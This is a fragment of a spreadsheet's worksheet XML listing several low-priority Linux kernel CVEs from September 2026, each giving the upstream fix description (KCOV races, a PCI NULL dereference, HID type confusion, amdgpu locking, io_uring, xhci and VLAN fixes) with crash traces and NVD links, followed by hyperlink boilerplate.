      <c r="C2293" s="5" t="inlineStr"/>
      <c r="D2293" s="5" t="inlineStr"/>
      <c r="E2293" s="5" t="inlineStr"/>
      <c r="F2293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2293" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2293" s="5" t="inlineStr"/>
      <c r="I2293" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2293" s="5" t="inlineStr"/>
      <c r="K2293" s="5" t="inlineStr"/>
      <c r="L2293" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Fix DPT allocation paths.
Remove the fallback for VRAM to system memory, I tested it and that
doesn't work at all, only a black screen with pipe fault errors were
observed.
On systems with media GT, extra latency is added when accessing stolen
memory when the GT is in MC6. Since we additionally aren't counting how
much memory is used for stolen and we could in theory fill up the
entire stolen area with DPT's, avoid using stolen and only use the
default memory region.
Using stolen may also result in random system hangs under load.
(cherry picked from commit a196406a3831291598fe8e73245914f7acffdfe0)</t>
        </is>
      </c>
      <c r="M2293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80915</t>
        </is>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80916</t>
        </is>
      </c>
      <c r="C2294" s="5" t="inlineStr"/>
      <c r="D2294" s="5" t="inlineStr"/>
      <c r="E2294" s="5" t="inlineStr"/>
      <c r="F2294" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2294" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2294" s="5" t="inlineStr"/>
      <c r="I2294" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2294" s="5" t="inlineStr"/>
      <c r="K2294" s="5" t="inlineStr"/>
      <c r="L2294" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kcov: fix data corruption and race conditions on PREEMPT_RT
syzbot is reporting KCOV state corruption on PREEMPT_RT kernels, for the
temporary storage used for saving/restoring remote KCOV state is currently
allocated as the per-CPU area.
On PREEMPT_RT kernels, softirq handlers run as preemptible task threads
(e.g., ksoftirqd). If a softirq context preempts a task running a remote
KCOV session, it safely saves the task's state into the per-CPU area.
However, if that softirq thread is subsequently preempted by a higher-
priority softirq thread on the same CPU, the second softirq will overwrite
the same per-CPU area, permanently destroying the original task's KCOV
state.
Fix this data corruption by moving the temporary storage from the per-CPU
area to the per-thread area. Since each softirq thread now owns its own
task context, nested softirq preemption no longer causes data overwrites.
Note that while the temporary storage is now on a per-thread basis, the
per-CPU kcov_percpu_data.lock must be retained, for we need to ensure that
kcov_remote_start() and kcov_remote_stop() operate atomically without
racing against asynchronous interrupts that manipulate the current task's
KCOV state.
It is likely that GFP_KERNEL allocation by vmalloc_node() in kcov_init()
has already called panic() before returning NULL, for there will be no
OOM-killable userspace processes when __init function of built-in module
runs. But this patch also fixes crashing the kernel when vmalloc_node()
in kcov_init() returned NULL, for kcov_init() left per-CPU irq_area == NULL
but kcov_remote_start() depends on per-CPU irq_area != NULL, resulting in
  (1) doing vmalloc() in kcov_remote_start() despite !in_task() context
  (2) out-of-array-bounds access if (1) succeeded but
      kcov-&gt;remote_size &lt; CONFIG_KCOV_IRQ_AREA_SIZE
  (3) always leak memory allocated by (1), eventually killing all
      OOM-killable userspace processes
problems.</t>
        </is>
      </c>
      <c r="M2294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80916</t>
        </is>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80917</t>
        </is>
      </c>
      <c r="C2295" s="5" t="inlineStr"/>
      <c r="D2295" s="5" t="inlineStr"/>
      <c r="E2295" s="5" t="inlineStr"/>
      <c r="F2295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2295" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2295" s="5" t="inlineStr"/>
      <c r="I2295" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2295" s="5" t="inlineStr"/>
      <c r="K2295" s="5" t="inlineStr"/>
      <c r="L2295" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: host-generic: Fix NULL pointer dereference on 32-bit CAM systems
On 32-bit systems the config space is too large to ioremap in one go, so
pci_ecam_create() maps each bus segment separately and relies on the
-&gt;add_bus callback (pci_ecam_add_bus) to populate the per-bus mapping in
cfg-&gt;winp[]. pci_ecam_map_bus() then uses that mapping as the base for
every config access.
The generic ECAM ops (pci_generic_ecam_ops) already provide the -&gt;add_bus
and -&gt;remove_bus callbacks, but the CAM (legacy) ops in pci-host-generic.c
do not. As a result, on a 32-bit host using "pci-host-cam-generic" the
per-bus mapping is never set up and the first config read dereferences a
NULL base, crashing during bus enumeration:
 Unable to handle kernel NULL pointer dereference at virtual address 00000800
 Oops [#1]
 CPU: 0 PID: 1 Comm: swapper Not tainted 6.9.7+ #43
 Hardware name: Digilent Nexys-Video-A7 RV32 (DT)
 epc : pci_generic_config_read+0x40/0xb0
  ra : pci_generic_config_read+0x2c/0xb0
 [&lt;c038db9c&gt;] pci_generic_config_read+0x40/0xb0
 [&lt;c038da04&gt;] pci_bus_read_config_dword+0x50/0xb0
 [&lt;c0391e94&gt;] pci_bus_generic_read_dev_vendor_id+0x3c/0x1ec
 [&lt;c039245c&gt;] pci_scan_single_device+0xa4/0x11c
 [&lt;c0392570&gt;] pci_scan_slot+0x9c/0x23c
 [&lt;c039388c&gt;] pci_scan_child_bus_extend+0x58/0x2f4
 [&lt;c0393db0&gt;] pci_scan_root_bus_bridge+0x64/0xe8
 [&lt;c0393e54&gt;] pci_host_probe+0x20/0xc8
 [&lt;c03bc6f4&gt;] pci_host_common_probe+0x144/0x1e4
Fix this by giving the CAM ops the same -&gt;add_bus/-&gt;remove_bus callbacks.
Since pci_ecam_add_bus() and pci_ecam_remove_bus() are static to ecam.c,
move the CAM ops definition there as pci_generic_cam_ops (mirroring
pci_generic_ecam_ops) and export it for pci-host-generic.c to reference.
[mani: removed timestamp from log]</t>
        </is>
      </c>
      <c r="M2295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80917</t>
        </is>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80918</t>
        </is>
      </c>
      <c r="C2296" s="5" t="inlineStr"/>
      <c r="D2296" s="5" t="inlineStr"/>
      <c r="E2296" s="5" t="inlineStr"/>
      <c r="F2296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2296" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2296" s="5" t="inlineStr"/>
      <c r="I2296" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2296" s="5" t="inlineStr"/>
      <c r="K2296" s="5" t="inlineStr"/>
      <c r="L2296" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: core: fix number/pointer type confusion on long items
When fetch_item() is called by hid_scan_report() on an item with
HID_ITEM_TAG_LONG, it stores a pointer to the item data in
item-&gt;data.longdata instead of storing a value directly in
item-&gt;data.{u8/u16/u32}.
When item_udata() or item_sdata() encounters such an item, it incorrectly
assumes that the item is in short format, and therefore returns the lower
part of a kernel pointer reinterpreted as a number.
When a HID device is connected whose descriptor contains a
HID_GLOBAL_ITEM_TAG_REPORT_SIZE encoded in long format with size=4, this
causes the lower half of a kernel pointer to be printed into dmesg as a
number, like this:
    hid (null): invalid report_size 107953555
To fix it, let item_udata() and item_sdata() verify that the item is in
short format.
Note that this bug only affects hid_scan_report(), while the main parsing
pass hid_parse_collections() will always bail out when encountering a long
item.
Sidenote: There are currently no users of data.longdata; maybe we should
just remove any parsing of long-format descriptors as a follow-up.</t>
        </is>
      </c>
      <c r="M2296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80918</t>
        </is>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80919</t>
        </is>
      </c>
      <c r="C2297" s="5" t="inlineStr"/>
      <c r="D2297" s="5" t="inlineStr"/>
      <c r="E2297" s="5" t="inlineStr"/>
      <c r="F2297" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2297" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2297" s="5" t="inlineStr"/>
      <c r="I2297" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2297" s="5" t="inlineStr"/>
      <c r="K2297" s="5" t="inlineStr"/>
      <c r="L2297" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix recursive ww_mutex acquire in amdgpu_devcoredump_format
When dumping IB contents from a hung job, amdgpu_devcoredump_format()
acquired the VM root PD's reservation via amdgpu_vm_lock_by_pasid() and
then, for each IB, called amdgpu_bo_reserve() on the BO backing the IB.
Both reservations are reservation_ww_class_mutex objects and neither
used a ww_acquire_ctx, which trips lockdep:
  WARNING: possible recursive locking detected
  --------------------------------------------
  kworker/u128:0 is trying to acquire lock:
  ffff88838b16e1f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
  but task is already holding lock:
  ffff8882f82681f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
   Possible unsafe locking scenario:
         CPU0
         ----
    lock(reservation_ww_class_mutex);
    lock(reservation_ww_class_mutex);
   *** DEADLOCK ***
   May be due to missing lock nesting notation
  Workqueue: events_unbound amdgpu_devcoredump_deferred_work [amdgpu]
  Call Trace:
   __ww_mutex_lock.constprop.0
   ww_mutex_lock
   amdgpu_bo_reserve
   amdgpu_devcoredump_format+0x1594 [amdgpu]
   amdgpu_devcoredump_deferred_work+0xea [amdgpu]
The two reservations are on different BOs in the captured trace, so the
splat is a lockdep-correctness warning, not an observed deadlock. It
becomes a real self-deadlock whenever the IB BO shares its dma_resv with
the root PD (the always-valid case, see amdgpu_vm_is_bo_always_valid()):
amdgpu_bo_reserve(abo) re-acquires the same ww_mutex without a ticket
and blocks forever. With amdgpu.gpu_recovery=0 the timeout handler
refires every ~2 s and each invocation produces this splat, drowning the
kernel ring buffer.
Now that amdgpu_vm_lock_by_pasid() takes a drm_exec context, move the IB
dumping into a separate helper that locks the root PD and every IB BO
together in a single drm_exec ticket. DRM_EXEC_IGNORE_DUPLICATES handles
IB BOs that share a dma_resv (e.g. always-valid BOs, or two IBs backed
by the same BO). Every lock is now a top-level acquire under one
ww_acquire_ctx, so the recursive ww_mutex condition is gone, and the
per-IB amdgpu_bo_reserve()/amdgpu_bo_unref() dance -- including a BO
refcount leak on the amdgpu_bo_reserve() failure path -- is removed.
(cherry picked from commit d6bf4242731219ee08ce54c365631e395486651e)</t>
        </is>
      </c>
      <c r="M2297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80919</t>
        </is>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80920</t>
        </is>
      </c>
      <c r="C2298" s="5" t="inlineStr"/>
      <c r="D2298" s="5" t="inlineStr"/>
      <c r="E2298" s="5" t="inlineStr"/>
      <c r="F2298" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2298" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2298" s="5" t="inlineStr"/>
      <c r="I2298" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2298" s="5" t="inlineStr"/>
      <c r="K2298" s="5" t="inlineStr"/>
      <c r="L2298" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring: defer eventfd signaling when queued from a wakeup handler
io_req_local_work_add() signals the CQ ring eventfd inline when it is the
one to push the first entry onto -&gt;work_list. For DEFER_TASKRUN rings that
add is frequently done from a waitqueue wakeup handler, where an
arbitrary waitqueue lock is held.
eventfd_signal_mask() only refuses to recurse when current-&gt;in_eventfd
is set, but that bit is set by eventfd_signal_mask() itself. If the wake
chain starts somewhere else, signal goes out inline and can feed back
into epoll.
Add IOU_F_TWQ_IN_WAKE, set it on the task_work add done from the three
waitqueue callbacks, and use it to force io_eventfd_signal() down the
existing call_rcu_hurry() deferral instead of signaling inline.</t>
        </is>
      </c>
      <c r="M2298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80920</t>
        </is>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80922</t>
        </is>
      </c>
      <c r="C2299" s="5" t="inlineStr"/>
      <c r="D2299" s="5" t="inlineStr"/>
      <c r="E2299" s="5" t="inlineStr"/>
      <c r="F2299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2299" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2299" s="5" t="inlineStr"/>
      <c r="I2299" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2299" s="5" t="inlineStr"/>
      <c r="K2299" s="5" t="inlineStr"/>
      <c r="L2299" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qcom-rng - Allow zero as a random number
Zero is a valid random number and needs to be allowed.  Otherwise the
output is distinguishable from random.</t>
        </is>
      </c>
      <c r="M2299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80922</t>
        </is>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80923</t>
        </is>
      </c>
      <c r="C2300" s="5" t="inlineStr"/>
      <c r="D2300" s="5" t="inlineStr"/>
      <c r="E2300" s="5" t="inlineStr"/>
      <c r="F2300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2300" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2300" s="5" t="inlineStr"/>
      <c r="I2300" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2300" s="5" t="inlineStr"/>
      <c r="K2300" s="5" t="inlineStr"/>
      <c r="L2300" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xhci: dbgtty: Fix unregister on tty_register_driver() failure
If tty_register_driver() fails, it drops the reference, but fails to set
the global dbc_tty_driver to NULL, causing the unregister to be called
again when module exits.
On module unload dbc_tty_exit() only gates its cleanup on the driver
pointer being non-NULL, so it operates on the already-freed driver:
    module_init(xhci_hcd_init)
      xhci_hcd_init()
        xhci_dbc_init()                       [return value ignored]
          dbc_tty_init()
            tty_register_driver() fails
              tty_driver_kref_put()           -&gt; driver freed
              (dbc_tty_driver left dangling)
    ...
    module_exit(xhci_hcd_fini)
      xhci_hcd_fini()
        xhci_dbc_exit()
          dbc_tty_exit()
            if (dbc_tty_driver)               -&gt; true (dangling)
              tty_unregister_driver()         -&gt; use-after-free</t>
        </is>
      </c>
      <c r="M2300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80923</t>
        </is>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80925</t>
        </is>
      </c>
      <c r="C2301" s="5" t="inlineStr"/>
      <c r="D2301" s="5" t="inlineStr"/>
      <c r="E2301" s="5" t="inlineStr"/>
      <c r="F2301" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2301" s="5" t="inlineStr">
        <is>
          <t>linux kernel, f5</t>
        </is>
      </c>
      <c r="H2301" s="5" t="inlineStr"/>
      <c r="I2301" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2301" s="5" t="inlineStr"/>
      <c r="K2301" s="5" t="inlineStr"/>
      <c r="L2301" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vlan: fix skb_under_panic and races when toggling HW VLAN offload
Toggling hardware VLAN TX offload (NETIF_F_HW_VLAN_CTAG_TX or
NETIF_F_HW_VLAN_STAG_TX) on a lower device invokes vlan_transfer_features(),
which dynamically changed vlandev-&gt;hard_header_len.
This causes two issues:
1. Lockless TX paths (e.g. packet_snd in af_packet.c, ip6_finish_output2)
   read dev-&gt;hard_header_len without holding RTNL lock. Mutating
   hard_header_len dynamically under RTNL creates a data race where upper
   layers reserve insufficient headroom based on a stale hard_header_len,
   resulting in skb_under_panic when vlan_dev_hard_header() is called.
2. In addition, vlan_transfer_features() updated hard_header_len without
   updating header_ops, causing a mismatch between allocated headroom
   and header creation.
Always setting dev-&gt;hard_header_len = real_dev-&gt;hard_header_len and
dev-&gt;needed_headroom = real_dev-&gt;needed_headroom + VLAN_HLEN unconditionally
ensures:
- dev-&gt;hard_header_len remains 100% static and immutable at real_dev-&gt;hard_header_len,
  eliminating all dynamic runtime updates and data races on hard_header_len.
- Upper layers allocating skbs via LL_RESERVED_SPACE() will always reserve
  sufficient headroom for software VLAN tag insertion (real_dev-&gt;hard_header_len +
  real_dev-&gt;needed_headroom + VLAN_HLEN).
- vlandev inherits real_dev-&gt;needed_tailroom so underlying trailer/padding/ICV
  requirements are honored.
- AF_PACKET SOCK_RAW network header offsets remain correctly aligned at
  real_dev-&gt;hard_header_len.
- vlan_header_ops is used unconditionally.
Note to stable teams: Make sure to backport these commits:
e16e960d55a4 ("ipvlan: inherit needed_headroom and needed_tailroom from phy_dev")
cef51860becd ("macvlan: inherit needed_headroom and needed_tailroom from lowerdev")</t>
        </is>
      </c>
      <c r="M2301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80925</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:M2301"/>
  <conditionalFormatting sqref="D2:D230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2301">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1570" r:id="rId1569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1571" r:id="rId1570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1572" r:id="rId1571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1573" r:id="rId1572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1574" r:id="rId1573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1575" r:id="rId1574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1576" r:id="rId1575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1577" r:id="rId1576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1578" r:id="rId1577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1579" r:id="rId1578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1580" r:id="rId1579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1581" r:id="rId1580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1582" r:id="rId1581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1583" r:id="rId1582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1584" r:id="rId1583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1585" r:id="rId1584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1586" r:id="rId1585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1587" r:id="rId1586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1588" r:id="rId1587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1589" r:id="rId1588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1590" r:id="rId1589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1591" r:id="rId1590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1592" r:id="rId1591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1593" r:id="rId1592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1594" r:id="rId1593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1595" r:id="rId1594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1596" r:id="rId1595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1597" r:id="rId1596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1598" r:id="rId1597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1599" r:id="rId1598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1600" r:id="rId1599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1601" r:id="rId1600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1602" r:id="rId1601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1603" r:id="rId1602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1604" r:id="rId1603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1605" r:id="rId1604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1606" r:id="rId1605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1607" r:id="rId1606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1608" r:id="rId1607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1609" r:id="rId1608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1610" r:id="rId1609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1611" r:id="rId1610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1612" r:id="rId1611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1613" r:id="rId1612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1614" r:id="rId1613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1615" r:id="rId1614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1616" r:id="rId1615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1617" r:id="rId1616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1618" r:id="rId1617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1619" r:id="rId1618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1620" r:id="rId1619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1621" r:id="rId1620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1622" r:id="rId1621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1623" r:id="rId1622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1624" r:id="rId1623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1625" r:id="rId1624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1626" r:id="rId1625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1627" r:id="rId1626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1628" r:id="rId1627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1629" r:id="rId1628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1630" r:id="rId1629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1631" r:id="rId1630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1632" r:id="rId1631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1633" r:id="rId1632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1634" r:id="rId1633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1635" r:id="rId1634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1636" r:id="rId1635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1637" r:id="rId1636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1638" r:id="rId1637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1639" r:id="rId1638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1640" r:id="rId1639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1641" r:id="rId1640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1642" r:id="rId1641"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1643" r:id="rId1642"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1644" r:id="rId1643"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1645" r:id="rId1644"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1646" r:id="rId1645"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1647" r:id="rId1646"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1648" r:id="rId1647"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1649" r:id="rId1648"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1650" r:id="rId1649"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1651" r:id="rId1650"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1652" r:id="rId1651"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1653" r:id="rId1652"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1654" r:id="rId1653"/>
